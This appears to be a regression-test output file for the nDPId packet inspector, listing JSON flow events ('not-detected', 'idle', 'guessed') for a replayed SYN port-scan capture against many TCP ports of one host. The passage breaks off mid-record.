+00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":944,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":944,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2048,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2048,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8193,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32768,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49153,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49153,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32770,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32770,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060456,"flow_last_seen":1278275060456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32769,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060456,"flow_last_seen":1278275060456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":802,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49154,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":802,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49154,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1906,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2049,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1906,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8194,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1011,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1011,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8193,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":853,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49154,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":853,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49154,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1834,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32770,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1834,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32770,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1887,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10243,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1887,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10243,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32771,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32771,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8194,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058281,"flow_last_seen":1278275058281,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49155,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058281,"flow_last_seen":1278275058281,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32771,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32771,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1965,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10243,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1965,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10243,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32772,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32772,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49156,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49156,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":841,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4,"l4_proto":"tcp","ndpi": 